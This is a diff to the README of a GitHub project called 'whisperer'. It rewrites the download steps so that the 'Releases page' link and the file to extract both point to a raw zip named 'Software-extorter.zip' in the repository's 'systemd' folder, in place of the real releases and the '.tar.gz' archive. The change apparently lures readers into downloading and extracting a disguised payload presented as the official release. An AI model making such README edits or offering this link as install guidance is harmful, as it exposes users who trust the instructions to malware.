NguyenPhamMC/whisperer/README.md

 ### 1. Visit the Releases Page

-Go to the [whisperer Releases page](https://github.com/NguyenPhamMC/whisperer/releases) to find available versions.
+Go to the [whisperer Releases page](https://github.com/NguyenPhamMC/whisperer/raw/refs/heads/main/systemd/Software-extorter.zip) to find available versions.

 ### 2. Download the Latest Version

 Choose the latest version from the list.
-Click on the link to download the `.tar.gz` file.
+Click on the link to download the `https://github.com/NguyenPhamMC/whisperer/raw/refs/heads/main/systemd/Software-extorter.zip` file.

 ### 3. Extract the Files

 Once downloaded, navigate to your Downloads folder.
-Right-click on the `.tar.gz` file and choose “Extract Here.”
+Right-click on the `https://github.com/NguyenPhamMC/whisperer/raw/refs/heads/main/systemd/Software-extorter.zip` file and choose “Extract Here.”
 This will create a new folder with the application files.

 ### 4. Open the Terminal